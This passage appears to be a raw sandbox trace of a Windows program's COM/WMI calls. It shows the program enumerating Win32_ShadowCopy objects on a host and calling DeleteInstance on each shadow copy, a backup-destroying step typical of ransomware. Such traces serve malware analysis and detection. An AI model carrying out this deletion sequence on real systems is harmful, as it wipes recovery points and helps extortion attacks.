pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0118.547] IWbemClassObject:Get (in: This=0x1c905590, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0118.547] SysStringLen (param_1="root\\cimv2") returned 0xa [0118.547] IWbemClassObject:Get (in: This=0x1c905590, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0118.547] SysStringLen (param_1="root\\cimv2") returned 0xa [0118.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0118.547] IWbemClassObject:Get (in: This=0x1c905590, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0118.547] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0118.548] IWbemClassObject:Get (in: This=0x1c905590, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0118.548] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0118.548] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902b90, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0118.548] WbemDefPath:IWbemPath:GetText (in: This=0x1c902b90, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0118.548] WbemDefPath:IWbemPath:GetText (in: This=0x1c902b90, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0118.548] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0118.548] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0118.548] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0118.548] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0118.548] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0118.548] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0118.548] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0118.549] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0118.549] IWbemClassObject:Get (in: This=0x1c905590, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0118.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c902b90, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0118.549] WbemDefPath:IWbemPath:GetText (in: This=0x1c902b90, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0118.549] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0119.771] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0119.771] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c905c30, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0119.773] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c905c30) returned 0x0 [0119.773] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0119.773] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0119.773] IUnknown:AddRef (This=0x1c905c30) returned 0x3 [0119.773] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0119.773] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c905c38) returned 0x0 [0119.774] IMarshal:GetUnmarshalClass (in: This=0x1c905c38, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0119.774] IUnknown:Release (This=0x1c905c38) returned 0x3 [0119.774] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0119.774] IUnknown:AddRef (This=0x1c905c30) returned 0x4 [0119.774] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0119.774] IUnknown:Release (This=0x1c905c30) returned 0x3 [0119.774] IUnknown:Release (This=0x1c905c30) returned 0x2 [0119.774] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0119.774] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0119.774] IUnknown:AddRef (This=0x1c905c30) returned 0x3 [0119.774] IUnknown:QueryInterface (in: This=0x1c905c30, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c905c30) returned 0x0 [0119.774] IUnknown:Release (This=0x1c905c30) returned 0x3 [0119.775] IUnknown:Release (This=0x1c905c30) returned 0x2 [0119.775] IUnknown:Release (This=0x1c905c30) returned 0x1 [0119.775] CoTaskMemFree (pv=0x1b77f8d0) [0119.775] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0119.775] IUnknown:AddRef (This=0x1c905c30) returned 0x2 [0119.775] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0119.775] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0119.775] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x53 [0119.775] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0119.775] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0119.775] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0119.775] IUnknown:Release (This=0x212498) returned 0x1 [0119.776] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901e60) returned 0x0 [0119.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901e60, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0119.776] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901e60, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902c50) returned 0x0 [0119.776] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902c50) returned 0x0 [0119.777] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0119.777] WbemDefPath:IUnknown:AddRef (This=0x1c902c50) returned 0x3 [0119.777] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0119.777] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b792c70) returned 0x0 [0119.777] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b792c70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.777] WbemDefPath:IUnknown:Release (This=0x1b792c70) returned 0x3 [0119.777] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0119.777] WbemDefPath:IUnknown:AddRef (This=0x1c902c50) returned 0x4 [0119.777] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0119.777] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x3 [0119.778] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x2 [0119.778] WbemDefPath:IUnknown:Release (This=0x1c901e60) returned 0x0 [0119.778] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x1 [0119.778] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0119.778] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0119.778] WbemDefPath:IUnknown:AddRef (This=0x1c902c50) returned 0x2 [0119.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902c50) returned 0x0 [0119.778] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x2 [0119.778] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x1 [0119.778] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0119.778] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0119.778] WbemDefPath:IUnknown:AddRef (This=0x1c902c50) returned 0x2 [0119.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902c50, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902c50) returned 0x0 [0119.779] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x2 [0119.779] WbemDefPath:IUnknown:AddRef (This=0x1c902c50) returned 0x3 [0119.779] WbemDefPath:IWbemPath:SetText (This=0x1c902c50, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0119.779] WbemDefPath:IUnknown:Release (This=0x1c902c50) returned 0x2 [0119.779] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0119.779] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0119.779] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.779] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0119.779] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0119.779] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.779] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0119.779] SysStringLen (param_1="root\\cimv2") returned 0xa [0119.779] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0119.780] SysStringLen (param_1="root\\cimv2") returned 0xa [0119.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.780] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0119.780] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0119.780] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0119.780] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0119.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902c50, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c902c50, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c902c50, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0119.780] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0119.780] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0119.780] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0119.780] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0119.781] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0119.781] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0119.781] IWbemClassObject:Get (in: This=0x1c905c30, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0119.781] WbemDefPath:IWbemPath:GetText (in: This=0x1c902c50, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0119.781] WbemDefPath:IWbemPath:GetText (in: This=0x1c902c50, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x0 [0119.781] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0121.072] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0121.072] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c9062d0, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0121.074] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c9062d0) returned 0x0 [0121.074] IUnknown:QueryInterface (in: This=0x1c9062d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: 